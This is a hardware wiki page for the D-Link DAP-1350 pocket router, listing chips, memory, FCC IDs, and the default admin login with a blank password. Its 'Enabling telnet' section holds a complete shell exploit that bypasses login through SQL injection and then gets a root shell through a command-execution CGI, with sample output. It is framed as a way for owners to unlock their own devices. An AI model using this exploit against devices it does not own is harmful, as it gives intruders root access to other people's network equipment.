See 'WikiDevi' @ the Internet Archive (MW XML, Files, Images)
upgraded MW to 1.30 - maybe things are slightly less broken

D-Link DAP-1350 rev A1

From WikiDevi
Jump to: navigation, search

D-Link DAP-1350 A1
Availability: now

Manuf/OEM/ODM Cameo

FCC approval date: 15 September 2009
Country of manuf.: China

Amazon image

ASIN
B003Q9AZHU (Flag of the United States.svg, On Amazon, On CCC)
multiple revisions of this device, use caution

Type: wireless router, access point

FCC ID: KA2AP1350A1
Industry Canada ID: 4216A-AP1350

Power: 5 VDC, 2.5 A
Connector type: barrel

CPU1: Ralink RT3052 (384 MHz)
FLA1: 8 MiB
8,388,608 B
65,536 Kib
8,192 KiB
64 Mib
0.00781 GiB
(Macronix MX29LV640EBTI-70G)
RAM1: 32 MiB
33,554,432 B
262,144 Kib
32,768 KiB
256 Mib
0.0313 GiB
(ESMT M12L128168A-7T × 2)

Expansion IFs: USB 2.0
USB ports: 1

WI1 chip1: Ralink RT3052
WI1 802dot11 protocols: bgn
WI1 MIMO config: 2x2:2
WI1 antenna connector: none

ETH chip1: Ralink RT3052
LAN speed: 10/100
LAN ports: 1

bgn

Stock FW OS: Linux

Third party firmware supported: OpenWrt

Default SSID: dlink (38 addl. devices)
Default IP address: 192.168.0.50
the IP 192.168.0.50 is used by 62 additional devices
of which 62 are D-Link devices
Default login user: admin
Default login password: blank
admin:blank credentials used by 314 additional devices
of which 179 are D-Link devices

802dot11 OUI: 00:18:E7 (10 E, 20 W, 2008)
Ethernet OUI: 00:18:E7 (10 E, 20 W, 2008)

For a list of all currently documented Ralink chipsets with specifications, see Ralink.


Wireless N Pocket Router & Access Point

Product page • Interface emulator

Forum threads[edit]

OpenWRT trunk contains support for the DAP-1350, however, the 12.09-beta is broken.
You can build your own firmware now or wait for the Attitude Adjustment release.

Enabling telnet[edit]

A vulnerability was discovered in the stock firmware which allows arbitrary commands to be executed as root using HTTP POST requests to a CGI program.

A secondary SQL injection vulnerability also exists allowing one to bypass HTTP authentication.

telnet
#!/bin/ksh

# DAP-1350 telnetd, by brynet.
# This effect all stock firmware images for the device.
# Tested on OpenBSD.

host=$1
if [ $# -ne 1 ]; then
	echo "usage: $0 host or ip"
	exit 1;
fi
base_req="POST /my_cgi.cgi?0.2592357019893825 HTTP/1.1\r\n"\
"Host: ${host}\r\nConnection: keep-alive\r\n"\
"Content-Type: application/x-www-form-urlencoded\r\n"

# user_name=admin
# user_pwd=';select 1;--
login_cmd="request=login&user_name=YWRtaW4&user_pwd=JztzZWxlY3QgMTstLQ"
login_clen="Content-Length: $(echo -n ${login_cmd} | wc -c)\r\n\r\n"
login_req="${base_req}${login_clen}${login_cmd}"

echo $login_req | nc $host 80 | grep default > /dev/null 2>&1
if [ $? -eq 0 ]; then
	echo "Authenticated."
else
	echo "Failed."
	exit 1;
fi
telnetd_cmd="request=admin_webtelnet&cmd=/usr/sbin/telnetd%20-l/bin/sh"
telnetd_clen="Content-Length: $(echo -n ${telnetd_cmd} | wc -c)\r\n\r\n"
telnetd_req="${base_req}${telnetd_clen}${telnetd_cmd}"

echo $telnetd_req | nc $host 80 > /dev/null 2>&1
sleep 2; nc -z $host 23 > /dev/null 2>&1
if [ $? -eq 0 ]; then
	echo "Root shell, okey doke."
	telnet $host
else
	echo "No root.. sorry, heh."
	exit 1;
fi

Note: nc(1) may be installed as netcat(1) on some systems. Modify as necessary.

    $ ./exploit.sh dlinkap # 192.168.0.50
    Authenticated.
    Root shell, okey doke.
    Trying 192.168.0.50...
    Connected to dlinkap.
    Escape character is '^]'.
    ... motd/etc.
    #

The factory set root password is unknown, so no login(1) process is started.
You must run the exploit script each time the device is powered on.